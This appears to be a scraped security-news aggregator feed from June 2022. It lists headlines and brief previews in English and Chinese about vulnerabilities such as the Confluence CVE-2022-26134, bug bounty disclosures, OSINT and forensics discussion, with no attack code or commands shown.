    这篇文章/笔记的话,打算从类加载器,双亲委派到代码块的加载顺序这样来讲。最后才是加载字节码。
    EvilBox-One靶机渗透
    EvilBox: One靶机是简单级别靶机,用于 VirtualBox。
  • Open

    Tails 5.1 arrives with a fix for a serious JavaScript security vulnerability
    Article URL: https://www.neowin.net/news/tails-51-arrives-with-a-fix-for-a-serious-javascript-security-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31630555 Points: 1 # Comments: 0
  • Open

    Creating a backdoor in PAM in 5 line of code
    No content preview
    Owasp crAPI: Introducing API Security The Hacker Way
    No content preview
    Testing EDRs for Linux — Things I wish I knew before getting started
    No content preview
  • Open

    Creating a backdoor in PAM in 5 line of code
    No content preview
    Owasp crAPI: Introducing API Security The Hacker Way
    No content preview
    Testing EDRs for Linux — Things I wish I knew before getting started
    No content preview
  • Open

    Creating a backdoor in PAM in 5 line of code
    No content preview
    Owasp crAPI: Introducing API Security The Hacker Way
    No content preview
    Testing EDRs for Linux — Things I wish I knew before getting started
    No content preview
  • Open

    Hunting suspicious LDAP queries in tons of logs
    Enumeration and Reconnaissance in AD Environment Continue reading on Medium »

  • Open

    I Have Find Serval Bugs In Circle.so & They Don’t Paid
    Hi Folks, Continue reading on Medium »
    Iagon Token Bridge UI Bug Bounty
    You better watch out, it’s bug hunting season! Continue reading on Iagon Official »
    Networking Protocols Explained | CyberSecurity
    Networking Protocols: FTP, SSH, Telnet, SMTP, DNS, HTTP, HTTPS, POP3, IMAP, RDP, TCP, UDP, ARP, RARP, DHCP, MTP, SFTP, SSL, TLS, NTP, PPP… Continue reading on Medium »
    DNS in easy way
    dns is phonbook of internet where domain names are translated to ip address.computer Continue reading on Medium »
  • Open

    What are some free non-zero policy encryption sites that protect data?
    I currently use Tresorit, and I store a single DB file of my customers on their site. However, I recently lost access and couldn't recover that file, but I did have a backup elsewhere. Instead of recovering the account, I was forced to reset my account because of said zero knowledge policy. submitted by /u/inert- [link] [comments]
    SynAck Red Team
    Hi, I saw many people mentioning they're part of SynAck Red Team. Is that a job ? are they getting paid ? submitted by /u/Spare_Prize1148 [link] [comments]
    How Likely is a Malicious MITM Attack on the Cellular Network?
    Hi everyone, For background: I have been playing around with a SIM7000e 4g module that connects to the CAT-M1 cellular network here in Australia. I purchased it in order to send GPS coordinates to dweet . io. Essentially I want to make a GPS tracker for my motorcycle. The thing is: I can send data via HTTP but not HTTPS. I have been trying for so many hours to send data via HTTPS with no luck. Some AT commands you're supposed to input, the module doesnt seem to even recognize. But thats not why I am here. I wanted to ask how likely is it that a hacker could use something like a stingray to grab my GPS coordinates if I sent them via HTTP? Does this type of attack happen often? (No personal details or other info would be sent with the coordinates) I have heard that devices like stingrays are extremely hard to get and very expensive. Furthermore, a hacker would not immediately no what the numbers mean, and even if they did, would not know what is currently situated at those coordinates. I am assuming that I am just being paranoid? Thanks submitted by /u/F0restFiend [link] [comments]
    Please help me with an internet stalker
    My best friend has been recently bombarded with dms on Instagram. They come from accounts that either have her name, birth date, or something along the lines. The messages are very graphic and threatening, telling her that if she attends a party or something they will sexually assault her or in some cases, end with her life. One of these accounts has also sent her a photo of her own house with similar caption. They messaged her mom, her friends, basically everyone in her social circle. The case has already been presented to the police but there's been no advances and each day she grows concerned. Is there any way to track a location, an email, a name, just... anything, if I provide a link to one of the profiles? I already tried out online tools and none have proven to be successful. If this weren't of such urgency I would not be asking, but we are running out of options. Each day is more terrifying for her, and painful for us, her friends. Thank you in advance. submitted by /u/smly7 [link] [comments]
  • Open

    Github Account Takeover from Docs page of `kubernetes-csi.github.io`
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1434967 - Bounty: $100
  • Open

    My website/domain investigation toolkit
    Domain and hosting data Reverse lookup Traffic and CMS analysis AD and DNS analysis  Backup and other services Continue reading on Medium »
    Ethereum OSINT
    I watched an interesting speech by Jeff Lomas, Detective and Criminologist with the Las Vegas Police Department on the investigation of… Continue reading on Medium »
    A Guide To Twitter advanced search operators: twitter hacking
    Social media intelligence (SMI or SOCMINT) Continue reading on Medium »
  • Open

    SecWiki News 2022-06-04 Review
    端口扫描技术实现分析 by ourren Awesome-Redteam: 一个红队知识仓库 by ourren ATT&CK矩阵的攻与防 by ourren bandit工具分析 by ourren 基于框架漏洞的代码审计实战 by ourren MITRE ATT&CK实践入门 by ourren Tomcat CVE-2022-29885 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-04 Review
    端口扫描技术实现分析 by ourren Awesome-Redteam: 一个红队知识仓库 by ourren ATT&CK矩阵的攻与防 by ourren bandit工具分析 by ourren 基于框架漏洞的代码审计实战 by ourren MITRE ATT&CK实践入门 by ourren Tomcat CVE-2022-29885 by ourren 更多最新文章,请访问SecWiki
  • Open

    Certificate Ripper released - tool to extract server certificates
    submitted by /u/Hakky54 [link] [comments]
    Technical Advisory – Multiple Vulnerabilities in U-Boot (CVE-2022-30790, CVE-2022-30552) - including remote write anywhere primitive in its IP stack
    submitted by /u/digicat [link] [comments]
  • Open

    萌新如何玩转mimikatz
    mimikatz就是我遇见的一个坎,我希望记录下这个过程,尽可能的帮助大家更快的掌握mimikatz的用法和技巧。
    萌新如何玩转mimikatz
    mimikatz就是我遇见的一个坎,我希望记录下这个过程,尽可能的帮助大家更快的掌握mimikatz的用法和技巧。
  • Open

    Is there a way (maybe an extention) to show thumnails for image lists like these? It would be nice to see what each item is before clicking it.
    submitted by /u/PmMeUrEncouragements [link] [comments]
  • Open

    Linux Hardening techniques
    Introduction Continue reading on InfoSec Write-ups »
    #Part 1 : The reality of modern information security in enterprise around the world.
    No content preview
  • Open

    Linux Hardening techniques
    Introduction Continue reading on InfoSec Write-ups »
    #Part 1 : The reality of modern information security in enterprise around the world.
    No content preview
  • Open

    Linux Hardening techniques
    Introduction Continue reading on InfoSec Write-ups »
    #Part 1 : The reality of modern information security in enterprise around the world.
    No content preview
  • Open

    PCIe DMA Attack against a secured Jetson Nano (CVE-2022-21819)
    Article URL: https://www.thegoodpenguin.co.uk/blog/pcie-dma-attack-against-a-secured-jetson-nano-cve-2022-21819/ Comments URL: https://news.ycombinator.com/item?id=31617467 Points: 23 # Comments: 0
  • Open

    UFED alternative for Samsung
    How can I do a Samsung smartphone Forensics Copy, without UFED? There is any free/open source software or solution? submitted by /u/Zipper_Ita [link] [comments]
  • Open

    Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022-26134)
    CVE-2022-26134 is a critical severity unauthenticated remote code execution vulnerability in Atlassian Confluence Server and Data Center. We share statistics on potentially vulnerable servers and provide suggestions for mitigation. The post Threat Brief: Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022-26134) appeared first on Unit42.
  • Open

    K8s 的核心是 API 而非容器:从理论到 CRD 实践(2022)
    本文串联了以下几篇文章的核心部分, Kubernetes isn’t about containers,2021 Kubernetes is a Database, 2019 CRD is just a table in Kubernetes, 2020 论述了 K8s 的核心价值是其通用、跨厂商和平台、可灵活扩展的声明式 API 框架, 而不是容器(虽然容器是它成功的基础);然后手动创建一个 API extension(CRD), 通过测试和类比来对这一论述有一个更直观的理解。 例子及测试基于 K8s v1.21.0,感谢原作者们的精彩文章。 1 K8s 的核心是其 API 框架而非容器 1.1 容器是基础 1.2 API 才是核心 1.2.1 K8s 之前:各自造轮子,封装厂商 API 差异 1.2.2 K8s 面世:标准化、跨厂商的 API、结构和语义 1.2.3 K8s API 扩展:CRD 1.3 小结 2 K8s 的 API 类型 2.1 标准 API(针对内置资源类型) 2.1.1 Namespaced 类型 2.1.2 Un-namespaced 类型 2.2 扩展 API(apiextension) 2.2.1 Namespaced 类型 2.2.2 Un-namespaced 类型 2.3 CRD 3 直观类比:K8s 是个数据库,CRD 是一张表,API 是 SQL 3.1 K8s 是个数据库 3.2 CRD 是一张表 3.2.1 定义表结构(CRD spec) 3.2.2 测试:CR 增删查改 vs. 数据库 SQL 3.3 API 是 SQL 4 其他 4.1 给 CR 打标签(label),根据 label 过滤 4.2 K8s API 与鉴权控制(R…

  • Open

    Popping Eagle: How Global Analytics Uncovered a Stealthy Threat Actor
    submitted by /u/RamblinWreckGT [link] [comments]
    Technical Analysis of Confluence CVE-2022-26134
    submitted by /u/chicksdigthelongrun [link] [comments]
    Detecting and mitigating CVE-2022-26134: Zero day at Atlassian Confluence
    submitted by /u/MiguelHzBz [link] [comments]
    Meeting Owl Pwnage
    submitted by /u/RudyWaltz [link] [comments]
    Released new version SCodeScanner. Added yaml scanning ability for scanning kubernetes configuration files. Github - https://github.com/agrawalsmart7/scodescanner
    submitted by /u/agrawal7 [link] [comments]
    WinRS and Exchange, a sneaky backdoor
    submitted by /u/picobello_bv [link] [comments]
    CVE-2022-30190 : Microsoft Windows Support Diagnostic Tool RCE
    submitted by /u/Late_Ice_9288 [link] [comments]
  • Open

    Swedish newspaper archive. 1884-2022.
    https://paperarchive-prod.svd.se/ submitted by /u/Pelicaros [link] [comments]
    Tons of scans of old books. Some older then the year 1600.
    http://scans.cartago.nl/ I have no idea what these books are about. Thought some of y'all might enjoy. I Copied this from the main site: ​ Are you a new visitor or do you want to know more about this site? This section gives you background information about Cartago. Also take a look at the Frequently Asked Questions for more information. What is Cartago? Cartago is the computer system of the Digital Charter Book Groningen and Drenthe. Nearly 35,000 deeds and other documents from before 1600 are included. This makes the sources for medieval culture and history accessible to a wide audience. Cartago is an initiative of the Stichting Digitaal Oorkondeboek Groningen and Drenthe. This foundation consists of representatives of the University of Groningen, the Groninger Archives, the Drents Archive and the former Drents Plateau. Learn more about the organization . Charters as source The charters are the main sources for Groningen and Drenthe up to 1600. This is special because elsewhere in the Netherlands usually city accounts, protocols and other registers are also available. Anyone who wants to research the Groningen and Drenthe history and culture before 1600 will therefore have to deal with the charters. Whether it concerns research into a village, a farm or a family. A charter is a document that serves as proof of a legal act. More information… Who is Cartago intended for? Cartago is suitable for anyone who is researching: ​ genealogy and heraldry local and regional history linguistics onomastics church history socio-economic history legal history In addition, Cartago focuses on education, including the charter game. Search in Cartago Via the Search section, visitors can quickly search the database. In addition to the images of the charters, any available transcripts also appear on the screen. A scranscript is a translation of the medieval text. Inventories ( www.archieven.nl ) can also be used to search for deeds. submitted by /u/Pelicaros [link] [comments]
    pictures from a hospital in Africa, marked NSFW because of a few images of skin infections of some kind
    submitted by /u/subwaytech [link] [comments]
  • Open

    LoveTok — HackTheBox — Web Exploitation — Challenge — Writeup
    Hello guys I am back to posting another writeup. So usually I don’t post writeups about HackTheBox challenges. But this was one of the… Continue reading on Medium »
    Burp Suite: Do I need the professional edition?
    No but it helps Continue reading on Medium »
    My first bug bounty in Business Logic
    Hey Hello, Hackers, Continue reading on Medium »
    Bug Bounty — Continue Penetration Testing
    Continue reading on Medium »
    2FA Bypass due to unauthorized 2FA disabling via X/CSRF
    Product Info Continue reading on Medium »
  • Open

    Understanding REvil: REvil Threat Actors May Have Returned (Updated)
    Ransomware cases worked by Unit 42 consultants in the first six months of 2021 reveal insights into the preferred tactics of REvil threat actors. The post Understanding REvil: REvil Threat Actors May Have Returned (Updated) appeared first on Unit42.
  • Open

    Solving Step 2 of Downtown Murderer without using reverse image search — Hacktoria
    Hacktoria’s monthly CTF in May was Downtown Murderer. There were 6 steps and I will focus in Step 2, which consists in geolocate three… Continue reading on Medium »
    War in Ukraine / June 2
    The first 100 days of the war in Ukraine Continue reading on Medium »
    The OSINT Exposure of Offshore Oil Platforms
    Offshore oil platforms, also known as oil rigs, are large industrial control systems meant to pull and process oil and natural gas from… Continue reading on Medium »
    The reverse image tools I use
    The reverse image tools I use Continue reading on Medium »
  • Open

    8ybhy85kld9zp9xf84x6.imgur.com Subdomain Takeover
    Imgur disclosed a bug submitted by mr_baka: https://hackerone.com/reports/1527405 - Bounty: $50
  • Open

    Apple Silicon “Augury” DMP Vulnerability
    Article URL: https://mjtsai.com/blog/2022/06/03/apple-silicon-augury-dmp-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31610726 Points: 2 # Comments: 0
    U.S. Technology, a Longtime Tool for Russia, Becomes a Vulnerability
    Article URL: https://www.nytimes.com/2022/06/02/business/economy/russia-weapons-american-technology.html Comments URL: https://news.ycombinator.com/item?id=31609058 Points: 3 # Comments: 0
  • Open

    What areas in DFIR are lacking research?
    What are some areas in DFIR that are lacking industry research? What would you want to see more of? submitted by /u/haloman882 [link] [comments]
    Evidence Mover / Robocopy / Teracopy ?
    Hi all! I have searched already for these keywords and I could not locate any previous questions related to this. What are you using for copying evidence from A to B? I have tried the tools mentioned in the title, but I was wondering if there is something different/better. Maybe even command-line? Workstations at work are Windows so I'm looking for options for Windows. submitted by /u/agente_99 [link] [comments]
  • Open

    SecWiki News 2022-06-03 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-03 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Vulnerability Management Runbook
    Hello guys/gals of this community. anyone experience with creating Vulnerability Management Runbooks? Or any resources that i can lean to? submitted by /u/hannibal_the_general [link] [comments]
    Starting with car hacking
    A little backstory first, after 15 years in various software development roles (using mostly C and C++), I have lost all motivation about the field Recently, I came across the research of Charlie Miller and Chris Valasek, and it sparked my interest for tech again. So the question is, what and from where do I start learning networking to be able to break into the car pentesting industry? I know very basic stuff, like subnetting, but not much more. Most tutorials on the internet do not go beyond just being able to answer the CCNA test's questions submitted by /u/Idonotlikeworking [link] [comments]
    I need help
    So someone I know has her sns accounts being hacked, she gets notified via email if her fb is being tapped into. The email shows the device name. I'm asking is if it's possible to trace the device name or at least the ip address, using the device name submitted by /u/IncidentMinimum [link] [comments]
  • Open

    Java反序列化基础篇-JDK动态代理
    Java反序列化基础篇-JDK动态代理,一文带你梳理清到底什么是 jdk 动态代理。为之后的 cc 链分析打好基础。
    以迷宫类比PHP反序列化链
    以走迷宫,类比PHP反序列化链; 给出一个了解php反序列化漏洞基本原理后,分析PHP框架反序列化漏洞的思路。
  • Open

    Kubernetes 101 | Setting up Kubernetes Cluster Locally
    This blog is about setting the local Kubernetes cluster for learning & testing using multiple tools like Kind, Minikube, Kubeadm & K3s. Continue reading on InfoSec Write-ups »
    Enumeration and lateral movement in GCP environments
    No content preview
    Android Pentesting Methodology (Pt. 1)
    No content preview
  • Open

    Kubernetes 101 | Setting up Kubernetes Cluster Locally
    This blog is about setting the local Kubernetes cluster for learning & testing using multiple tools like Kind, Minikube, Kubeadm & K3s. Continue reading on InfoSec Write-ups »
    Enumeration and lateral movement in GCP environments
    No content preview
    Android Pentesting Methodology (Pt. 1)
    No content preview
  • Open

    Kubernetes 101 | Setting up Kubernetes Cluster Locally
    This blog is about setting the local Kubernetes cluster for learning & testing using multiple tools like Kind, Minikube, Kubeadm & K3s. Continue reading on InfoSec Write-ups »
    Enumeration and lateral movement in GCP environments
    No content preview
    Android Pentesting Methodology (Pt. 1)
    No content preview
  • Open

    Cve-2022-26134: Active Exploitation of Atlassian Confluence
    Article URL: https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ Comments URL: https://news.ycombinator.com/item?id=31604711 Points: 2 # Comments: 0
    CVE-2022-26134: RCE in Atlassian Confluence and Data Center products
    Article URL: https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data Comments URL: https://news.ycombinator.com/item?id=31604258 Points: 3 # Comments: 1
  • Open

    Red Team Server
    Red Team Server (RTS) Continue reading on Medium »
    2FA Bypass due to unauthorized 2FA disabling via X/CSRF
    Product Info Continue reading on Medium »

  • Open

    Daily Cyber Brief
    submitted by /u/RandyMarsh_Lorde [link] [comments]
    Exploiting CVE-2022-26923 by Abusing AD CS
    We are doing 2 THM Labs. In the first one we are abusing vulnerable certificate templates manually with Certify and Rubeus, then changing the domain Administrator's password. In the second lab, we are utilizing Certipy POC to takeover DC machine and dump hashes for all users. Available on YouTube: https://youtu.be/HBRCI5O35R8 Hope you enjoy the video and learn something new. The channel is new and all feedback is appreciated. submitted by /u/lsecqt [link] [comments]
  • Open

    Unauthenticated Remote Code Execution in Atlassian Confluence (CVE-2022-26134)
    submitted by /u/sullivanmatt [link] [comments]
    Mining Google Chrome CVE data
    submitted by /u/onlinereadme [link] [comments]
  • Open

    Confluence – Critical unauthenticated remote code execution vulnerability
    Article URL: https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html Comments URL: https://news.ycombinator.com/item?id=31601794 Points: 10 # Comments: 3
    Illumina Cybersecurity Vulnerability
    Article URL: https://www.fda.gov/medical-devices/letters-health-care-providers/illumina-cybersecurity-vulnerability-may-present-risks-patient-results-and-customer-networks-letter Comments URL: https://news.ycombinator.com/item?id=31600655 Points: 1 # Comments: 0
  • Open

    Popping Eagle: How We Leveraged Global Analytics to Discover a Sophisticated Threat Actor
    We observed a specially crafted DLL hijacking attack used by a previously unknown piece of malware that we dubbed Popping Eagle. The post Popping Eagle: How We Leveraged Global Analytics to Discover a Sophisticated Threat Actor appeared first on Unit42.
  • Open

    Embedding Python Malware
    Writing malware in C is cool. What’s cooler? Writing malware in Python and embedding it in C-based malware. Let’s learn how to do that. Continue reading on Medium »
  • Open

    iphone remotely wiped inside faraday box
    I have an iphone 11 that was remotely wiped while it was inside a faraday cage. The phone was turned on while it was inside the cage, it booted into the "lost phone" screen for less than a second and then it began the wiping process. Any ideas on how something like this could happen? submitted by /u/croforensic [link] [comments]
    Internship/Mentorship opportunities
    Hello all I'm currently pursuing my Bachelor's degree in Computer forensics and digital investigation. I will be graduating next year and wanted to ask if anyone knew some places I can apply to internship or if anyone has mentorship programs. I want to get my foot in the door and start doing some hands-on work and learning the day to day work style. I would really appreciate any help or information on this matter. Thank you all in advance. submitted by /u/Sudden_Ad9859 [link] [comments]
    FTK imager error
    Hi, I did a FTK image of a ssd. I started and everything went well until ftk got to the point where it is verifying the image I get this message “imager encountered 32 error(s). the image is corrupted imager will attempt to retrieve remaining valid data” it still started to do a verification check after and no surprise it did end up not matching. But my question is. What does it mean? Does it have something to do with the cables? The data on the ssd? Or something else? If I understand it correctly I’m only copying the image so corrupted files shouldn’t ebe a problem, right? Also I’m taking an image from a windows computers ssd submitted by /u/Gackie [link] [comments]
    Chain of custody form
    Do you recommend the proposal of changing the traditional hardcopy form chain of custody to digital chain of custody? And why so? submitted by /u/alialibarrett [link] [comments]
    SMS Forensics - Android
    Assuming I have an unlocked android phone. I’d like to test mobile forensics tools, especially with SMS. Any recommendations on tools & techniques to image, parse, extract SMS info from an android device? I want to be able to answer questions like: When was a message sent/received? Has the timestamp been tempered with? Does it recognize different time zones then normalize the timestamps? Thank you. submitted by /u/trafficbridge [link] [comments]
  • Open

    More Misc Stuff
    submitted by /u/ilikemacsalot [link] [comments]
    Misc Stuff
    submitted by /u/ilikemacsalot [link] [comments]
    A few movies & series
    http://51.68.207.131/ Not a lot here, but did see some newer content. submitted by /u/dasheswithdots [link] [comments]
    photos of car parts
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Australian aviation photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Mining Google Chrome CVE Data
    Article URL: https://clearbluejar.github.io/posts/mining-google-chrome-cve-data/ Comments URL: https://news.ycombinator.com/item?id=31599584 Points: 2 # Comments: 0
    Using the Kani Rust Verifier on a Rust Standard Library CVE
    Article URL: https://model-checking.github.io//kani-verifier-blog/2022/06/01/using-the-kani-rust-verifier-on-a-rust-standard-library-cve.html Comments URL: https://news.ycombinator.com/item?id=31594351 Points: 3 # Comments: 0
  • Open

    The Fuzzing Book
    Article URL: https://www.fuzzingbook.org/ Comments URL: https://news.ycombinator.com/item?id=31598335 Points: 39 # Comments: 1
  • Open

    How to scope what harware I need for network monitoring?
    Hi there. I need a consultation. What is the step by step algorithm to understand what hardware specifications (CPU, RAM, Disks) do I need? I tried to setup ELK+Suricata+Zeek on VM server: 16 CPUs, 32 GB RAM, 950GB two discs: OS disk 450 GB 500 GB dedicated to elasticsearch But the amount of processing done by zeek and suricata made it a noisy neighbour for other VMs and killing the hypervisor, so I need to migrate to physhical servers, but I don't know how to calculate hardware specifications. submitted by /u/athanielx [link] [comments]
    How do you review and document Cyber Security implementation?
    How do you review and document Cyber Security implementation in an organization? submitted by /u/techno_it [link] [comments]
    Hardware RasberryPi Ad-blocker hooked up to WiFi, secure?
    Been using normal adblockers since they came about but i do not like all the data they are getting. How secure is a Rasberrypi blocker, hooked up to my wifi? Will it cause problems if i say, use streaming services on my TV for example? Because some adblockers in the past have been iffy when it comes to "real" streaming services with ads. And since this will be hardware i rather not plug it out if i need to watch a TV-channel's streaming app etc. (I mainly want the adblocker for youtube) I want to make as safe of a closed eco-system as i can, and still use technology somewhat normal. Im in the process of securing up everything i got times 2. If anyone got other solid tips that i can do on my own (without losing access to normal things) i am happy to hear it. Of course i always do the usual basic stuff, setting everything i can via GUI to barebone at first installation on every program. Battling cookies like 50times per day the last years etc etc etc. It's all so tiresome. submitted by /u/bukush [link] [comments]
  • Open

    War in Ukraine / June 1
    Because of Russia’s war, European countries are reconsidering their military policies Continue reading on Medium »
    Cyberseguridad en Costa Rica de la mano de un No-Experto
    IT Now IT NOW Hablemos de Cyberseguridad. Continue reading on Medium »
    Clean Your Images— OSINT Challenge 25
    We have a really short one for this round of quizzes. Quiztime (contributor @bayer_julia) shared a new OSINT quiz with us. The objective… Continue reading on Medium »
    What Is Open Source Intelligence (OSINT)?
    What Is Open Source Intelligence (OSINT)? Continue reading on Medium »
  • Open

    SecWiki News 2022-06-02 Review
    兰德深度报告-美国商业太空能力与市场概述 by ourren 重新定义SOAR by ourren FirmSec-物联网固件中的第三方组件安全性研究 by ourren CobaltStrike WebServer特征分析 by ourren Fuzzm: 针对WebAssembly内存错误的模糊测试 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-02 Review
    兰德深度报告-美国商业太空能力与市场概述 by ourren 重新定义SOAR by ourren FirmSec-物联网固件中的第三方组件安全性研究 by ourren CobaltStrike WebServer特征分析 by ourren Fuzzm: 针对WebAssembly内存错误的模糊测试 by ourren 更多最新文章,请访问SecWiki
  • Open

    美国BIS发布网络安全禁令,全球漏洞共享机制遭严峻挑战
    BIS此次发布的新规后,微软等国家科技巨头却表露出担忧,全球网络安全漏洞共享机制很有可能遭遇严峻挑战。
    “猎图行动”:针对NFT艺术家的窃密活动分析
    根据攻击手法、C2地址等特征将其关联为同一攻击组织发起的规模化窃密行动,由于攻击者的主要目标为NFT艺术品,安天将该活动命名为“猎图行动”。
    FreeBuf周报 | 360万+MySQL服务器暴露在互联网上;匿名者声称将对白俄罗斯发起入侵
    在计算机行业,“删库跑路”流传已久,早已成为诸多程序员用来发泄工作压力的口头语。
    一个excel邮件攻击样本的简要分析
    本次邮件是利用cve-2017-11882(EQNEDT32.EXE公式编辑器漏洞)进行攻击。
    Telegraph在网络钓鱼中或早已滥用成灾
    近日,有观察人士发现,通讯软件Telegram的匿名博客平台Telegraph可能正被网络钓鱼者积极利用。
    员工“删库跑路”,真能一走了之?
    很难想到,魔幻照进了现实,真的有“傻大胆”敢为人先,企图删库跑路,一走了之。
    慢雾:NFT 项目 verb 钓鱼网站分析
    对一切保持怀疑。
    FreeBuf早报 | 支付赎金的医疗机构比过去多两倍;四分之三公司因DNS攻击而停工
    近四分之三的公司因 DNS 攻击而停工。
    数百个Elasticsearch数据库遭到勒索攻击
    因为Elasticsearch数据库安全防护薄弱的缘故,导致其被黑客盯上。
    安全大事件!360万+MySQL服务器暴露在互联网上
    至少有360万台MySQL服务器已经暴露在互联网上,毫无疑问它们将成为黑客和勒索攻击者最有吸引力的目标。
    欧洲刑警组织宣布已查封恶意软件FluBot
    欧洲刑警组织在近期一次由11国组成的联合执法行动中,宣布正式取缔主要针对用户网银账号的恶意软件组织FluBot。
    密码应用安全性评估要点之数字签名技术
    数字签名技术是现代密码算法中非对称密码算法和消息摘要算法相结合的十分优秀的解决方案,应用面广泛,涉及到的知识点很多。
  • Open

    Complete Bug Bounty CheatSheet | Joas Antonio
    XSS, SQLi, SSRF, CRLF, CSV-Injection, Command Injection, Directory Traversal, LFI, XXE, Open-Redirect, RCE, Crypto, Template Injection… Continue reading on Medium »
    How I Mass hunt for Admin Panel Access…
    Hello All,🙂 Continue reading on Medium »
    Reverse Engineering Discord’s Party Mode
    Continue reading on Dev Genius »
    HTML Injection On Trio App
    Hey Hackers!!! I am back again! My name is Krishnadev P Melevila, To know more about me, Search on Google “ Who is Krishnadev P Melevila”! Continue reading on Medium »
    HTML Injection On Trio App
    Hey Hackers!!! I am back again! My name is Krishnadev P Melevila, To know more about me, Search on Google “ Who is Krishnadev P Melevila”! Continue reading on InfoSec Write-ups »
  • Open

    AWS Load Balancer Controller Managed Security Groups can be replaced by an unprivileged attacker
    Kubernetes disclosed a bug submitted by t0rr3sp3dr0: https://hackerone.com/reports/1238017 - Bounty: $500
    AWS Load Balancer Controller can be used by an attacker to modify rules of any Security Group that they are able to tag
    Kubernetes disclosed a bug submitted by t0rr3sp3dr0: https://hackerone.com/reports/1238482 - Bounty: $500

  • Open

    Real Player Remote Arbitrary Code Execution Vulnerability
    Article URL: https://github.com/Edubr2020/RP_DCP_Code_Exec Comments URL: https://news.ycombinator.com/item?id=31589107 Points: 2 # Comments: 1
    A powerful vulnerability scanner for Windows, macOS and Linux that you will love
    Article URL: https://www.mageni.net/ Comments URL: https://news.ycombinator.com/item?id=31588325 Points: 2 # Comments: 0
    CVE-2022-23088 – FreeBSD Network Subsystem Remote Code Execution Vulnerability
    Article URL: https://www.freebsd.org/security/advisories/FreeBSD-SA-22:07.wifi_meshid.asc Comments URL: https://news.ycombinator.com/item?id=31583875 Points: 1 # Comments: 1
    Microsoft Office zero-day vulnerability
    Article URL: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190 Comments URL: https://news.ycombinator.com/item?id=31580756 Points: 6 # Comments: 0
  • Open

    SANS FOR500 with no prior forensic experience?
    I am currently a Threat Intelligence Analyst. I was thinking about taking the For500 since I want to transition to Forensics. I am hesitant since I have no forensic experience/knowledge. Coming from a non technical background, would you recommend this course? submitted by /u/hackprincess [link] [comments]
    Avilla Forensics 3.0
    https://github.com/AvillaDaniel/AvillaForensics 🔎A very powerful set of tools for a forensic specialist. For full-fledged work, Java and python are required (packages:instaloader, mvt, pycryptodome and Whacipher). Only to work with smartphones, they must have debugging mode enabled. But the abundance of opportunities that we get for free is just amazing. Yes, there are products from Oxygen Software in Russia, but they are paid, although not much better, probably only working with cloud services like Oxygen, which is not enough, but do not forget that it's all completely free. submitted by /u/saqfi [link] [comments]
  • Open

    Exfiltrate GDrive access token using CSRF
    Dropbox disclosed a bug submitted by staz0t: https://hackerone.com/reports/1468010 - Bounty: $1728
    user can bypass password enforcement when federated sharing is enabled
    Nextcloud disclosed a bug submitted by michag86: https://hackerone.com/reports/838510 - Bounty: $250
  • Open

    Security Validation Tools
    Hey all, I was listening to a webinar today and one of the experts brought up security validation tools, which I hadn't heard before. I was curious if folks are using any of these, and what are the using? The way it was explained is a potential red team or other smaller team looking to find gaps in their own security. Some background, I've brought my company huge strides over the past 5 years improving our cyber program from training, monitoring, pentesting, everyday preventative tools, and annual 3rd party program maturation, but I don't know what I don't know, so I'm very curious. Appreciate everyone's time. submitted by /u/derf3970 [link] [comments]
    Ditching the OOTB SIEM
    After a less than successful SIEM transition, I am starting to look at the possibility of building a SIEM by integrating multiple COTs products. Essentially looking at integrating a data lake, XDR/Correlation capability and a SOAR solution. Has anyone successfully done this (aside from Palo’s SoC) and have any input/feedback to share? submitted by /u/Omnipotent0ne [link] [comments]
  • Open

    Some flicks
    http://www.lemaurecourtois.com/film/ submitted by /u/DismalDelay101 [link] [comments]
    Teaching Content site...! probably boring
    https://www.futuremanagers.com/wp-content/uploads/ submitted by /u/RE167 [link] [comments]
    Index of movies and media
    https://setnomanime.me/9:/Movies/ submitted by /u/Isolatedleliel [link] [comments]
  • Open

    Seven Essential Questions for Ethical War Crimes Documentation
    Considerations for those collecting, investigating, and analyzing open source information in Ukraine and elsewhere Continue reading on Human Rights Center »
    War in Ukraine / May 31
    Difficult situation in Severodonetsk Continue reading on Medium »
  • Open

    How I found a GoldMine but got No Gold
    Background: Continue reading on Medium »
    Kubernetes 101 | Setting up Kubernetes Cluster Locally
    This blog is about setting the local Kubernetes cluster for learning & testing using multiple tools like Kind, Minikube, Kubeadm & K3s. Continue reading on InfoSec Write-ups »
    Microsoft Dynamics Container Sandbox RCE via Unauthenticated Docker Remote API 20,000$ Bounty
    On 17.11.2021 I reported a critical security issue in Microsoft Dynamics Container Sandbox, that allows Microsoft Customers to setup a… Continue reading on Medium »
    Cryptography a Foundation of Cyber Security.
    Continue reading on Medium »
    Part 2: A pragmatic guide to building your bug bounty program
    Budgets and payments, and dealing with beg bounties Continue reading on Airwallex Engineering »
    WordPress User Meta Lite / Pro 2.4.3 Suffers Path Traversal Exploit
    More @ https://skynettools.com  Currently the WordPress Plugin User Meta 2.4.3, both Lite and Pro is vulnerable to a Path Traversal… Continue reading on Medium »
    Good to see you back. I have always loved your write ups. Simple and to the point. Keep it up
    Continue reading on Medium »
  • Open

    Using Python to unearth a goldmine of threat intelligence from leaked chat logs
    submitted by /u/SCI_Rusher [link] [comments]
    Information Security BASICS - Anvil Secure
    submitted by /u/anvilventures [link] [comments]
    Unofficial patches for the 0-day vulnerability called Follina (CVE-2022-30190)
    submitted by /u/CyberMasterV [link] [comments]
    GCP exploitation & lateral movement write up! - @securfreakazoid
    submitted by /u/securfreakazoid [link] [comments]
    Twitch Internal Security Tools: In-depth Analysis of the Leaked Twitch Security Tools
    submitted by /u/mazen160 [link] [comments]
    Sushi Time: Hunting for Fresh Phish
